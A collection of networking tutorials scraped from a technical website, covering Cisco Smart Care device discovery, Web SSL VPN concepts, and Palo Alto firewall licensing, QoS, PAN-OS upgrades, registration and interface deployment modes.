The first step involves the Cisco engineer inserting the network subnets that need to be scanned by the appliance to discover the Cisco devices. Scrolling further below (not shown) the system requires the SNMP string which will be used to connect to each discovered device and obtain all necessary information. As it is evident, SNMP must be enabled on all Cisco devices we want to be discovered, using a read-only string.

This technique is favourable because it allows you to control which equipment are added to the Smart Care contract. If the Smart Care appliance can't 'see' them - they aren't added to the contract!

As soon as all the information is entered, hitting the Next button starts the scanning process as shown below:

tk-cisco-smartcare-25

The screen will show the discovered hosts in real-time and won't take longer than a couple of minutes to complete, depending on the amount of hosts the network has.

As each device is successfully discovered, the system shows its Status, Device Type, Eligibility and Details. This will help ensure the correct devices are discovered.

In our first discovery process, the ASA 5510 appliances were not discovered due to the strict firewall policies in place. This was a reminder that when performing the discovery, you must ensure firewall access lists are not blocking SNMP queries to the devices.

Thankfully, we are able to re-run the discovery process and add the missing devices later on.

As soon as the process is complete, we are presented with the final table of discovered devices. Here we get the chance to make any last changes and select the proper device, in case the Smart Care appliance made a mistake - something we have never encountered so far.

tk-cisco-smartcare-26

Clicking on the Details button doesn't do much other than display the IP Address and SNMP MIB Tree information of the discovered device - slightly useless information we believe.

Now all that is needed is to hit the Save and Continue button so the system can add these devices to the Cisco Smart Care service so they become available to the customer's inventory.

tk-cisco-smartcare-27

The Cisco Smart Care service allows the Cisco Partner to run the discover process and add devices to the service at any time, however, these additional devices (assuming they are not already covered) can force the Smart Care service device weight jump to the next level. When this happens, an invoice is automatically generated and sent to the partner!

Therefore, to help avoid covering equipment accidently, the system always provides a number of warnings before allowing you to accept the changes:

tk-cisco-smartcare-28

For this installation, all devices had been pre-inserted into the Smart Care portal in order to generate the initial quotation. As these devices are now discovered, we will see duplicate entries in the inventory. As a last step, we simply need to delete the older entries, effectively replacing them with the newly discovered devices.

Inventorying The Discovered Cisco Devices

After running the discovery service, if we visit the Discovered Devices section from the menu, the system will confirm the devices found already exist in the system and report that we need to run the inventory service:

Following the instructions, we select Services under the customer's Administration menu:

This will load the Service Control panel where we can execute on the spot a number of services or schedule them to automatically run at specific times and dates. The panel will also show when exactly the available services were executed.

To continue our setup, we select the Run Now... button to initiate the Inventory service.

tk-cisco-smartcare-31

Like most partner-initiated services, this is a 4-step process where we selected the discovered devices to the inventoried:

tk-cisco-smartcare-32

After selecting the devices to be inventoried and clicking the Next button, we are asked to enter the necessary credentials for each Cisco device, so that the Smart Care appliance can log into each device.

This might come as a surprise to some engineers, however it is necessary because the Cisco Smart Care appliance actually logs into each device and obtains a full list of all components installed, including part numbers, serial numbers, PVDMs (Cisco DSPs), slots in which cards are installed (for routers) and even Cisco Unity Express modules (if installed)!

The amount of information later on provided will surprise you as it is extremely comprehensive.

tk-cisco-smartcare-33

In case an incorrect username or password is entered, the system will reported a failure to log into the affected device and we will be able to later on re-run the inventory service and enter the correct credentials. For any given device who's credentials are correct, the SmartCare appliance will save this information for all future monitoring services to be run.

As we complete entering all information and select the protocol used to access each device, we can click on the Next button to start the inventory process:

tk-cisco-smartcare-34

At this point, the Smart Care portal queues the operation at the customer's Smart Care appliance and will begin to execute in a minute or two.

The time required to complete the inventory process will depend on the amount of devices and their complexity. For our setup, the process did not take more than 5 minutes to complete.

As soon as the process completes, we are presented with a brief summary of the process and are able to Terminate (close) the window. This will take us back to the Service Control panel where the Inventory will show as sucessfully executed along with a date and time.

tk-cisco-smartcare-35

With the inventory process complete, the last step is to schedule or run the Core, Security and Voice technology processes in order to examine and monitor the equipment discovered.

The Core, Security and Voice process is out of this article's scope and will be covered in future articles.

Summary

This article introduced the Cisco Smart Care service and explained the secret details of this service, which is executed by Cisco Smart Care authorized partners only. We saw the setup process of the Smart Care appliance, the portal setup including discovery and inventorying process of Cisco devices.

 

 

  • Hits: 95671

WEB SSL VPN - The Next Wave Of Secure VPN Services

Fifteen years ago Virtual Private Networks (VPN) access was a fairly new concept to most businesses. While large corporations already had a good head-start with VPN technologies, the rest were starting to realise the potential and possibilities provided by VPN connections provided. Vendors such as Cisco, Checkpoint, Microsoft and many more, started to produce a variety of products that provided VPN services to business. Today, VPN is considered a standard feature in any serious security-router related product and is widely implemented throughout almost all companies.

Early VPN products required, as many still do today, their own client which is usually installed on the remote workstation that requires access to the local network. The encryption methods and supported protocols made them either a very good choice, or simply a very bad one which could be easily compromised. These days, IPSec based VPNs are a standard, using the IP Security protocol and a number of other relative protocols, they provide adequate security and encryption to ensure a session is secure and properly encrypted.

VPN clients are usually preconfigured by the company's IT department with the necessary details and all end users need to do is launch the SSL VPN program and enter their credentials. Once user credentials are verified, they are granted access to the company's network and all associated security policies (such as access control lists) are applied.

We would say that, until recently (last 5 years), one of the major fall backs with VPN solutions was the fact that their vendors would in most cases only support their own VPN client, making the product usable only with their software – a major drawback for most companies. Another big problem with VPN clients is the fact they usually support specific operating systems. For example, many vendors provide VPN clients for Windows based operating systems but few support 64bit operating systems! Linux and Unix systems are usually out of luck when it comes to vendor-based VPN clients but, thanks to the open source community, solutions are freely available .

But these are just a few of the problems vpn-users and administrators are faced with. Getting access to your corporate VPN in most cases requires custom ports to be open through the firewall that's in front. Hotels and public hotspots usually block these ports and only allow very specific protocols to pass through such as HTTP, HTTPS, POP3, SMTP and others.

Web SSL VPN has started to change all that. As the name implies, Web SSL VPN is a popular version of VPNs, moving in a complete different direction from that which most vendors have been used to.

What is Web SSL VPN?

Web SSL VPN is, as the name implies, a web-based VPN client. While this might not mean much to many, it's actually a revolution in VPN technology! By moving from the program-based VPN client to a web-based VPN client, the operating system is no longer a problem. You can download, install and run your web-based VPN client on any operating system without a second thought!

Web SSL VPN works by communicating over standard HTTPS (SSL) protocol, allowing it to pass through almost any proxy or firewall that might be limiting your access. Once connected, a small java-based client is downloaded to the computer's web browser which creates a virtual connection between your computer and VPN concentrator or firewall providing the service.

web-ssl-vpn-1

An early version of Cisco Web VPN client, being downloaded and preparing its installation

The great part about Web SSL VPN is that it will automatically download if needed on to your computer and install itself. Once your session is over, it can be configured (by the administrator setting up the VPN service) to automatically delete itself from the computer, leaving no trace of the VPN client!

This means that using Web SSL VPN, you can safely log on to your corporate network from another computer, without requiring special certificates installed or group passwords at the user end. All you need to know is your own credentials and the URL to your Web SSL VPN concentrator.

web-ssl-vpn-2

After installation, your connection is established with the corporate Firewall

Another big advantage of Web SSL VPN is that it supports ‘split tunnelling' natively. Split tunnelling is a technique where when connected to a VPN network, only traffic destined for that network is encrypted and passed over the tunnel. All other traffic (e.g Internet browsing) bypasses the tunnel and is sent directly to the Internet as any normal connection. Split tunnelling is a wonderful feature that allows users to do necessary work through the VPN, but also maintain a direct Internet connection. Of course, this feature is easily disabled, again, by the administrator of your VPN concentrator.

Note: WebVPN for Cisco IOS routers is fully covered in our article: Configuring WebSSL VPN AnyConnect on Cisco IOS Routers.

Is Web based VPN Considered Safe?

Fortunately Web based VPN connections do not suffer from the same vulnerabilities as websites and webservers. The technology might use the same protocols (HTTP & HTTPS), however the Web SSL VPN implementation is completely different for most vendors. The non-web server based solution of Web SSL VPN offers a much more secure approach and is generally considered safe. The main difference here is that you've got a dedicated appliance offering a web service, and not a dedicated machine with a buggy operating system and web server full of exploits.

Web SSL VPN is considered to be very secure and capable of encrypting your user sessions so that no data is compromised over the VPN.

Client-Side Security of Web SSL VPN

The latest Web SSL VPN solutions offered have certainly improved in both performance and security requirements for the end user. They are now capable of checking a number of parameters on the host's side to decide whether or not to install. Administrators are able to create their own policies that would allow the Web SSL VPN client to install on a host's PC only if the host has a firewall installed and operating on its system, or if it has a valid up to date antivirus. If any of these requirements are not met, the Web SSL VPN client can fail to install.

VPN Application Support for Web SSL VPN

Early Web SSL VPNs, or First-Generation Web SSL VPNs, supported fewer features and protocols and provided secure access mainly to Intranet web-based application services. Their limited functionality and immaturity did not allow many companies to see them as an alternative to the well-known vpn client program.

As things started to progress and the Second-Generation of Web SSL VPNs came out, there was full support for all IP-based applications. Intranet Web services, File services, ERP services and pretty much anything you can think of is now capable of running through a second generation Web SSL VPN. This is also called a True SSL VPN solution as it completely replaces the IPSec based VPN client used until now.

Today, all Web SSL VPNs offer tunnelling of all IP Services, thereby falling into the second category .

Business Value of Web SSL VPN

While this fairly new technology is great, is there any real value in it for business? The answer is clearly ‘Yes'. Here are a few pointers that will help clarify:

• Easy to setup with a lot less administrative overhead and technical support required due to the ease of use.

• Costs less than traditional IPSec VPNs. They do not require propriety vpn client software to be purchased or licensed (in most cases).

• SSL makes use of Port 443. This almost guarantees it will work though any firewall that provides standard Internet access, without the need for any special configuration. No more troubled users trying to connect to the corporate network due to a restrictive Internet connection.

• Compatible with all operating system and web browsers.

• Full IP application support – replacing IPSec vpn client programs completely

• Ability to create security policies and allow access only when these policies are met e.g. Firewall, up to date antivirus and more.

• Available on servers, firewalls and even routers! You don't necessarily need a dedicated machine only for your VPN users as it is supported even on small devices such as Cisco 870 series routers!

WebVPN for Cisco IOS routers is fully covered in our article: Configuring WebSSL VPN AnyConnect on Cisco IOS Routers.

Summary

We saw what the Web SSL VPN hype is all about and it's good. As time passes, more vendors will start offering these solutions in their products. The message is 'use them'– don't be afraid to adopt these solutions as they will help you solve a great deal more problems and help get the job done better, faster and safer.

Invest in Web SSL VPN – it's the future of remote VPN access.

  • Hits: 54460
Palo Alto Networks Software NGFW (Flex) Credits

The Ultimate Guide to Palo Alto Networks Software NGFW (Flex) Credits. How NGFW credits work, Renewal considerations, Online Credit Estimator, Deployment Profiles

Palo Alto Networks - Introduction to Software NFGW Flex CreditsDiscover the ins and outs of using Palo Alto Networks’ Software NGFW (Flex) credits to seamlessly renew your cloud-based or virtualized software NGFW devices! Dive into this exciting guide where we unravel the mysteries of software NGFW credits, show you how they're allocated to your deployment profile, and walk you through the renewal and verification process.

Learn to calculate your required NGFW credits with the online Credit Estimator and much more. Get ready to master your NGFW credits and keep your network security top-notch!

Key Topics:

Grasping the Basics of Software NGFW (Flex) Credits

Palo Alto Networks’ Cloud-based (Azure, AWS, GCP) and virtualized (ESXi, Hyper-V, KVM) deployments, aka software NGFW devices, are licensed using Software NGFW credits (Flex Credits). When deploying a software NGFW device, you are required to purchase the correct amount of NGFW credits to allow the deployment, licensing and operation of the device. The amount of NGFW credits required, depend on the specifications of your NGFW device which include:

  • Number and type (VM-Series or CN-Series) of firewalls deployed.
  • Number of vCPUs per firewall.
  • Subscriptions e.g Threat Prevention, URL Filtering, Wildfire etc.
  • Management Options e.g Panorama Management, Panorama Log Collector etc.
  • Support Options e.g Premium or Platinum support.

NGFW credits are subscription-based, meaning they expire 12 or 36 months after purchase (depending on your contract), regardless of how many credits you use.  For example, if you purchase 100 NGFW credits 12-month subscription and use 80 NGFW credits for your deployment, the remaining 20 NGFW credits will be available for consumption, but expire at the end of the contract.

It's crucial to purchase the right amount of NGFW credits to minimize any that go unused.

Estimating Your NGFW Credit Needs with the Credit Estimator

Palo Alto Networks, NGFW Credits, Flex Credits, Renewal, Credit Estimator, Deployment Profile

Continue reading

  • Hits: 3116
Palo Alto Firewalls - Understanding and configuring QoS

Configuring QoS on Palo Alto Firewalls: Class-based Policies, QoS Profiles, Enabling QoS on Firewall Interfaces

Palo Alto Firewalls - Understanding and configuring QoSThis article’s purpose is to help you quickly master Palo Alto QoS concepts and learn to configure QoS on Palo Alto Firewalls in a simple and efficient way. QoS is considered a complicated topic however thanks to Palo Alto’s intuitive firewall GUI interface and our real-scenarios, you’ll quickly grasp all necessary QoS basics and be ready to implement your own QoS policies!

You’ll learn basic QoS terms such as Ingress and Egress traffic, Differentiated Service Code Point (DSCP), Traffic Policing, Traffic Shaping, Palo Alto QoS Classes, Palo Alto QoS Policies, how to build Palo Alto QoS policies, how to configure Palo Alto QoS Classes and finally how to enable and monitor QoS on Palo Alto firewall interfaces (both standalone & AE Aggregate interfaces), view QoS bandwidth graphs and more!

Key Topics:

Find more great articles by visiting our Palo Alto Firewall Section.

Introduction to Palo Alto QoS

QoS was born from the IEEE group during 1995-1998 by establishing the standard IEEE 802.1P. The main purpose of QoS is to prioritise desired traffic over other type of traffic or to limit the amount of bandwidth applications can consume, by utilizing different mechanisms. This ensures network performance, avoids bottlenecks, congestion or overutilization of network links. A frequently used example of QoS is the prioritising Real-time traffic e.g voice or video, over other type of traffic:

Palo Alto Firewall - QoS Priority Queues & Packet PrioritizationQoS Priority Queues - Packet classification and prioritization

In the example above, voice packets (blue) are given a higher priority against others, therefore immediately being forwarded by the firewall out via the output interface. Since voice packets are very sensitive to delay, they are usually handled with priority to avoid issues in a real-time voice streams e.g VoIP telephone call between two endpoints.

Overview of QoS Configuration on Palo Alto Firewalls

Firewall, Palo Alto, QoS, QoS Classes

Continue reading

  • Hits: 7790
How to Manually Upgrade Update Install PAN-OS

How to Manually Download, Import & Install PAN-OS on Palo Alto Firewalls via CLI & Web GUI interface

Palo Alto PAN-OS Manual update - upload - upgradeThis article provides comprehensive guidance on the manual processes involved in downloading, uploading, and installing (import) any PAN-OS version on a Palo Alto Firewall. It details the steps for searching and downloading the desired PAN-OS version, as well as the supported methods for uploading the software to your Palo Alto Firewall, including Web, TFTP, and SCP. Additionally, the article offers valuable tips aimed at facilitating a smooth and successful upgrade process.

The necessity for a manual upgrade of a Palo Alto firewall arises in instances where the system operates within an isolated environment employing air-gap architecture and lacks direct internet access. This requirement is further applicable in scenarios where the firewall is devoid of valid licenses, remains unregistered, or serves as a replacement unit as exemplified in a Return Merchandise Authorization (RMA) context.

Whether performing upgrades manually or automatically, it is crucial to consider the same upgrade path rules outlined in our article Complete guide to upgrading Palo Alto firewalls. Individuals unfamiliar with these rules are strongly encouraged to review the article before initiating any PAN-OS upgrade.

Key Topics:

Explore our dedicated Palo Alto section to access a collection of high-quality technical articles.

Downloading PAN-OS Software

Begin by downloading the needed software from the Palo Alto Networks support page. Make sure you have a valid support contract.

Once logged in, select Updates on the left pane, followed by Software Updates from the right pane:

Continue reading

  • Hits: 20164
IPSec VPN - Palo Alto Firewall and Meraki MX

Complete Guide: Configuring IPSec VPN between Palo Alto Firewall & Meraki MX Security Appliance

configuring IPSec VPN between Palo Alto firewall and Meraki MXThis article will show you how to configure an IPSec VPN tunnel between a Palo Alto firewall (all PANOS versions) and Meraki MX security appliance. Our comprehensive guide includes IPSec VPN setup for static & dynamic IP endpoints, Full tunnel VPN configuration, Split tunnel VPN configuration, special considerations for Full & Split tunnel modes,  IPSec Phase 1 - IKE gateway & crypto policies, IPSec Phase 2Tunnel encryption algorithms & authentication plus more.

 Key Topics:

Palo Alto Firewall Setup

Meraki MX Security Appliance Setup

This article assumes both Palo Alto firewall and Meraki MX are fully configured to allow local clients access to the internet. We’ll first begin with the configuration of the Palo Alto firewall and then work on the Meraki MX appliance.

Visit our Palo Alto Firewall section for more articles covering Palo Alto technologies.

Step 1 – Create a Tunnel Interface

Under Network, select Interfaces then the Tunnel menu option. The firewall will now show all configured tunnel interfaces. The interface ‘tunnel’, as shown below, by default exists on all firewalls:

Firewall, Palo Alto, VPN, IPSec, Meraki, Full tunnel, Split tunnel, IKE, Crypto tunnel, IPSec Tunnel, VPN routing, Meraki MX

Continue reading

  • Hits: 16653

Complete Guide to Upgrading Palo Alto Firewall PAN-OS & Panorama. Prerequisites, Upgrade Paths, Config Backup, Application & Threats Update & More

Upgrading your Palo Alto Firewall or Panorama Management System to the preferred PAN-OS release is always recommended as it ensures it remains stable, safe from known vulnerabilities and exploits but also allows you to take advantage of new features.

This article will show you how to upgrade your standalone Firewall PAN-OS, explain the differences between a Base Image and a Maintenance Release Image. We’ll also explain the PAN-OS upgrade paths, show how to backup and export your configuration, deal with common PAN-OS install errors (upgrading requires greater content version). Finally, we will explain why newer PAN-OS releases might not be visible for download in your firewall’s software section.

While the same process described below can be used to upgrade Panorama PAN-OS, it is important to ensure the Panorama PAN-OS version is equal or greater than the firewalls. When upgrading PAN-OS for both Panorama and Firewall appliances, always upgrade Panorama first.

Key Topics:

Our article How to Manually Download, Import & Install PAN-OS on Palo Alto Firewalls via CLI & Web GUI interface provides detailed instructions and insights on PAN-OS upgrades for unlicensed/unregistered Palo Alto Firewalls .

Prerequisites for PAN-OS Upgrades

It is important to note that only eligible Palo Alto customers, that is, those with an active contract, can receive updates for their firewalls. Our article How to Register and Activate Palo Alto Support, Subscription Servers, and Licenses covers this process in great detail.

Understanding PAN-OS Upgrade Paths

Direct (one-step) upgrade to the latest PAN-OS depends on the current version your firewall is running. When upgrading from a fairly old to a newer PAN-OS version, multi-step upgrades might be necessary. This ensures the device’s configuration is migrated to the PAN-OS's newer supported features and that nothing “breaks” during the upgrade process.

Like most vendors, Palo Alto Networks produce a base image and maintenance releases. Maintenance releases are small upgrades of the base image and deal with bug fixes and sometimes introduce small enhancements.

As a rule of thumb, firewalls should be running the Palo Alto preferred PAN-OS release (requires account login), and it is generally a good practice to install these releases as they are published.

When upgrading your PAN-OS to the latest maintenance release of a newer base release, the firewall will likely require you to download the new base release before allowing you to install its latest maintenance release.

For example, our firewall is currently running version 9.0.3-h3, noted by the ‘tick’ on the Currently Installed column, and our goal is to upgrade to version 9.1.4 (preferred release) as shown below:

Palo Alto PAN-OS upgrade path

When attempting to download version 9.1.4, a maintenance release for base 9.1.0, we received an error (see screenshot below) explaining that we need to download 9.1.0 base image first (no installation required). Once downloaded, we can proceed with the download and installation of version 9.1.4.

palo alto firewall upgrading requires greater content version

Backing Up & Exporting Firewall Configuration

It is imperative to backup and export the configuration before attempting to upgrade. To create a backup go to Devices > Setup, then select the Operations (3) tab and Save named configuration snapshot (4):

backup current palo alto firewall configuration

Once the backup is complete, it is highly recommend to export the configuration by selecting Export named configuration snapshot (5) and saving it in a safe place.

Downloading & Installing PAN-OS Software

We will be upgrading our firewall from PAN-OS 9.0.3-h3 to 9.1.4. As explained previously, for this process, we will download base 9.1.0 and then download & install maintenance release 9.1.4.

Newer PAN-OS versions can be downloaded directly from the firewall GUI (recommended). Alternatively, they can be downloaded from https://support.paloaltonetworks.com  and then upload it manually.

From the GUI, go to Device > Software, then click on Check Now (3) to update the software list. When complete, click on Download (4) for base image 9.1.0:

download install pan-os on palo alto firewall

When complete, click on Download (5) on version 9.1.4, then install (option will be available once the image has downloaded). During the installation a progress bar will be displayed:

palo alto firewall installing pan-os software

As soon as the installation process is complete, the firewall will ask to reboot:

palo alto firewall reboot after pan-os installation

Dealing with Common Install Errors: Upgrading Requires Greater Content Version

A common error users are faced with when attempting to install a newer PAN-OS is the “Error: Upgrading from xxx to xxx requires a content version 8226 or greater and found 8165-5521” error as shown below:

palo alto firewall upgrade requires greater content version

This error is related to the Applications and Threats version the firewall is currently running which is most likely outdated. 

To fix this, go to Device > Dynamic Updates and click on the Check Now (3) button as shown below:

palo alto firewall upgrading applications threats version

Next, download (5) the latest version of Applications and Threats. Once the download is complete, the install option will become available. Proceed with the installation of the newly downloaded Applications and Threats version:

palo alto firewall installing applications and threats

Another common error is the Image File Authentication Error – Failed to Load into Software Manager error. This is covered in detail in our article How to Fix Palo Alto Firewall “Error: Image File Authentication Error”.

Why Aren’t the Latest PAN-OS Releases Available for Download?

Palo Alto Networks continuously publish new PAN-OS releases; however, they might not be available/visible on your firewall if they are not compatible with the version your firewall is currently running.

At the time of writing, PAN-OS 10.0 was available however if you take a close look at the available software, you notice that it is not listed:

palo alto firewall check for new pan-os

After upgrading to version 9.1.4 we went back and clicked the Check Now button. PAN-OS 10 was available to download and install:

 pan-os new images after upgrade

Summary

This article showed how to upgrade a standalone Palo Alto Firewall PAN-OS, it explained the different PAN-OS images (Base Image, Maintenance Release) and PAN-OS upgrade paths depending on your current PAN-OS. We also saw how to download and install the PAN-OS software, common installation errors (requires greater content version error) and finally explained why latest PAN-OS releases are not made available in your firewall’s software download section.

  • Hits: 89252

How to Fix Palo Alto Firewall “Error: Image File Authentication Error – Failed to Load Into Software Manager” error during PAN-OS Software Download

palo alto firewall software upgrade errorKeeping your Palo Alto Firewall up to date with the latest PAN-OS software updates is an important step to ensure your organization is protected against the PAN-OS latest software vulnerabilities, software bugs but at the same time take advantage of Palo Alto’s latest security enhancements and capabilities.

While Palo Alto Networks makes the software upgrade process an easy task, sometimes problems can occur. One frequently seen issue is the “Error: Image File Authentication Error – Failed to Load into Software Manager” error when trying to download a new software image.

Readers and also refer to our articles How to Manually Download, Import & Install PAN-OS on Palo Alto Firewalls via CLI & Web GUI interface and Complete Guide to Upgrading Palo Alto Firewall PAN-OS & Panorama. Prerequisites, Upgrade Paths, Config Backup, Application & Threats Update & More for more technical insights and advice on PAN-OS upgrades.

This error can occur on a standalone or HA-Pair Firewall configuration:

palo alto firewall image file authentication error

Additional technical articles are available in our Palo Alto Firewall Section.

How To Fix The 'Image File Authentication Error'

To fix this problem, simply click the Check Now link at the bottom left corner. This will force the Palo Alto Firewall to connect to the update server and refresh the list of available software images:

palo alto firewall checking for new software

 As soon as the above refresh process is complete, you can proceed to download the desired software image:

palo alto firewall download new software PAN-OS image

The screenshot below confirms the selected image has been downloaded and loaded into software manager, ready to be installed:

palo alto firewall new PAN-OS software image downloaded

More Information About The Error

The “Error: Image File Authentication Error – Failed to Load into Software Manager” error is encountered after initiating the download of any image from within the Software area:

palo alto firewall - initiate software download

As soon as the user initiates the download process, the Firewall will begin downloading the selected PAN-OS version. Once the download is complete the progress bar reaches the 99% mark and will pause for a significant time as shown below:

palo alto firewall PAN-OS software download in progress

During this process, a closer look at the firewall logs via SSH shows the following error is produced:

admin @ PA-850-Firewall.cx-Primary(active)> tail follow yes mp-log ms.log

2019-10-05 17:02:52.534 +1000 client dagger reported op command was SUCCESSFUL
2019-10-05 17:02:55.946 +1000 get_sw_ver_info file: /opt/pancfg/mgmt/global/upgradeinfo.xml
2019-10-05 17:02:55.967 +1000 get_sw_ver_info file: /opt/pancfg/mgmt/global/uploadinfo.xml
2019-10-05 17:02:55.968 +1000 No upload information available
sh: line 1: /tmp/pan/downloadprogress.12337: No such file or directory
'cfg.fail-conn-on-cert': NO_MATCHES

The linux tail command will continuously update the ms.log file entries so you can observe in real-time all entries within the log file.

The log output seems to imply that there is a missing file or some type of information is not available. This issue is fixed as soon as the firewall is forced to check for new updates.

Summary

This article explains how to resolve the “Error: Image File Authentication Error – Failed to Load into Software Manager” error encountered when trying to download a new firewall software image. We showed the error produced by the firewall and how to fix this by forcing the firewall to Check for new software updates. We also dived into the mp-log ms.log log file and examined the messages produced there during the error.

  • Hits: 35213

How to Register a Palo Alto Firewall and Activate Support, Subscription Services & Licenses. Covers All Models.

palo alto networks logoThis article explains how to register and activate your Palo Alto Firewall Appliance to obtain technical support, RMA hardware replacement, product updates, antivirus updates, wildfire, antispam updates, Threat Prevention, URL Filtering, Global Protect and more. The article covers all Palo Alto Firewalls including: PA-220, PA-820, PA-850, PA-3220, PA-3250, PA-3260, PA-5220, PA-5250, PA-5260, PA-5280, PA-7050, PA-7080 and all VM Series.

Customers purchasing a new Palo Alto Firewall appliance or support contract will receive an authorization code which is required to activate their technical support, license and service subscriptions – this, plus lots more useful information is included below.

Key Topics:

Additional technical articles are available in our Palo Alto Firewall Section

The diagram below shows the steps new customers should follow to successfully register and activate their Palo Alto products:

palo alto license registration diagram

Benefits of a Support Account, Firewall Registration and License Activation

Registering your security appliance has many benefits, especially when you consider that any unpatched or outdated security appliance is unable to provide adequate protection against today’s complex and intelligent security threats. Furthermore by registering your appliance you are protecting your investment as you become a ‘known’ customer to Palo Alto allowing you to engage the vendor and benefit from the wide range of services offered.

By creating a Support Account, registering your Firewall appliance and activating your License you’ll be able to perform the following:

  • Register and manage your firewall appliances(s). Palo Alto call these “Assets
  • Create and manage support cases
  • Create and manage users from your organization
  • Give members of your team access to Palo Alto support services
  • Gain access to a variety of tools found in the support portal
  • Obtain knowledge and answers to questions
  • Obtain access to the Palo Alto live community
  • Download PAN-OS (Palo Alto Operating System) software updates for your device
  • Download Antivirus updates
  • Download Antispam updates
  • Download Threat protection updates
  • Update App-ID Database on your device
  • Ensure the URL Filtering engine is up to date
  • Gain access to Wildfire which allows the firewall to safely ‘detonate’ suspicious files in the cloud

The above list is indicative and shows the variety of services offered to registered Palo Alto customers with an active subscription service.

Creating a Palo Alto Support Account - New Customers

Registering your account is a simple process that only takes a few minutes. During the registration process you’ll be able to register your Palo Alto Firewall appliance and later activate your support and subscription license. To begin, visit the Palo Alto Support page https://support.paloaltonetworks.com/ and click on the Sign In link at the top right corner of the page:

palo alto networks customer support portal

On the next screen, enter a valid email address, verify you’re human (reCAPTCHA) and finally click on the Submit button:

palo alto networks - creating a new support account

On the next page select to register your device using its Serial Number or Authorization Code or alternatively you can register a VM-Series model purchased from the public cloud marketplace or a Could Security Provider (CSSP). In our example, we’ll be selecting the first option. When ready, click on the Submit button:

palo alto create a new support account device registration

Next, enter all required details to create the new account. Towards the end of the page you can enter the Device Serial Number or Auth Code. We selected to insert the device serial number:

palo alto new user registration final screen

The Auth Code is an 8-digit code which is emailed to the customer (PDF file) as soon as the physical appliance is shipped from Palo Alto Networks. This means that under most circumstances the Auth Code is received before the physical appliance.

When filling in your details keep in mind that it is important to ensure the address entered is correct as it will be used for any future RMA process.

It is highly advisable to subscribe to all mailing lists to ensure you receive updates and security advisory notifications.

Once the registration process is complete, you can proceed activating the support and software licenses.

Registering a Palo Alto Device – New & Existing Customers

Existing customers with support contracts need to follow a similar process outline below in order to register their new Palo Alto device and activate the subscription services purchased.

To begin, visit the Palo Alto Support page https://support.paloaltonetworks.com/ and click on the Sign In link at the top right corner of the page. On the next page, click on the Go to portal button:

palo alto networks - customer support portal

Next, enter your Email Address and Password to complete the login process.

Once done, you’ll be presented with the main Customer Support page where you’ll find important alerts regarding the support portal and see a summary of your recent activity as shown in the below screenshot. Now click on the Register a Device button:

palo alto networks register a device for existing customers

On the next page select the Device Type. Select the correct Device Type. We selected Register device using Serial Number or Authorization Code to register our firewall appliance. When ready, click on the Next button:

palo alto networks - existing customers firewall device registration

Now provide the device Serial Number, Device Name (provide a meaningful name to help distinguish this device from other devices) and Location information for RMA purposes. We can tick the Device will be used offline option if the device is to be used in an isolated environment with no internet access.

When ready click on the Agree and Submit button at the bottom right of the page (not shown):

palo alto networks - existing customers firewall registration device information

After a few seconds the support portal will confirm our Palo Alto Firewall was successfully registered and provide the highly recommended option of Run Day 1 Configuration:

palo alto networks - existing customers firewall device registration successful

The optional Day 1 Configuration step can be run by clicking on the Run Day 1 Configuration button. If you decide to skip this step you can find this option from the main support page, under the Tools section as shown in the screenshot below:

palo alto run day 1 configuration option

When selecting Run Day 1 Configuration, you need to provide some basic information about your firewall such as Hostname, Management IP address, PAN-OS version, DNS Servers etc. This information is then used to generate an initial firewall configuration file (xml file) based on Palo Alto Networks Best Practices.

You can then download the file and upload it to the firewall appliance using it as a base configuration.

The Run Day 1 Configuration option is a great start for people with limited experience on Palo Alto Firewalls but is also a good practice to follow for any newly deployed Firewalls and therefore highly recommended.

The Run Day 1 Configuration tool is designed for new (unconfigured) firewalls! Applying to a production device will clear its configuration!

Activating Palo Alto Support and Subscription License

Once the Firewall registration process is complete, the final step is to activate your license. When this process is complete, the Firewall appliance will be covered under warranty replacement, be able to download software PAN-OS updates and depending on the subscriptions purchased, have access to Wildfire, URL filtering, Antispyware, Threat Intelligence updates and more.

To activate licenses, your Palo Alto user account must be assigned the ELA Administrator role. You can add this role under Members > Manage Users

To begin, from the Support Home page navigate to Assets > Devices. Here you’ll see a list of all currently registered devices. Locate the device for which the license needs to be activated and click on the pencil icon under the Actions column:

palo alto networks - activate support and subscription services - step 1

On the next page select Activate Auth-Code under the Activate Licenses section and insert the Authorization Code. Now click on the Agree and Submit button:

palo alto networks - activate support and subscription services - step 2

Once the activation process is complete a green bar will briefly appear confirming the license was successfully activated. Notice how the page has been updated to include the features activated along with their Expiration Date:

palo alto networks - activate support and subscription services - step 3

If you have multiple service (or feature) licenses purchased for your product, for example Threat Prevention License, WildFire License, Support etc, insert the Authorization Code for one service and click on the Agree and Submit button. Repeat the process until all services/features are activated.

This completes the Palo Alto License Activation process. You should now have all licenses/features fully registered and able to obtain technical support for your device(s).

Summary

In this article we outlined the benefits of registering your Palo Alto security device. We explained in detail how to create a Palo Alto support account, register your Palo Alto Firewall and how to activate your Palo Alto License & Subscription services in order to obtain technical support, RMA hardware replacement, product updates, antivirus updates, wildfire, antispam updates, Threat Prevention, URL Filtering, Global Protect and more.

  • Hits: 58605

Palo Alto Firewall Configuration Options. Tap Mode, Virtual Wire, Layer 2 & Layer 3 Deployment modes

Our previous article explained how Palo Alto Firewalls make use of Security Zones to process and enforce security policies. This article will explain the different configuration options for physical Ethernet and logical interfaces available on the Palo Alto Firewall.

It’s easy to mix and match the interface types and deployment options in real world deployments and this seems to be the strongest selling point of Palo Alto Networks Next-Generation Firewalls. Network segmentation becomes easier due to the flexibility offered by a single pair of Palo Alto appliances.

Below is a list of the configuration options available for Ethernet (physical) interfaces:

  • Tap Mode
  • Virtual Wire
  • Layer 2
  • Layer 3
  • Aggregate Interfaces
  • HA

Following are the Logical interface options available:

  • VLAN
  • Loopback
  • Tunnel
  • Decrypt Mirror

The various interface types offered by Palo Alto Networks Next-Generation Firewalls provide flexible deployment options.

Tap Mode Deployment Option

TAP Mode deployment allows passive monitoring of the traffic flow across a network by using the SPAN feature (also known as mirroring).

A typical deployment would involve the configuration of SPAN on Cisco Catalyst switches where the destination SPAN port is the switch port to which our Palo Alto Firewall connects, as shown in the diagram below:

 Palo Alto Next Generation Firewall deployed in TAP mode

Figure 1. Palo Alto Next Generation Firewall deployed in TAP mode

The advantage of this deployment model is that it allows organizations to closely monitor traffic to their servers or network without requiring any changes to the network infrastructure.

During the configuration of SPAN it is important to ensure the correct SPAN source and SPAN Destination ports are configured while also enabling Tap mode at the Firewall.

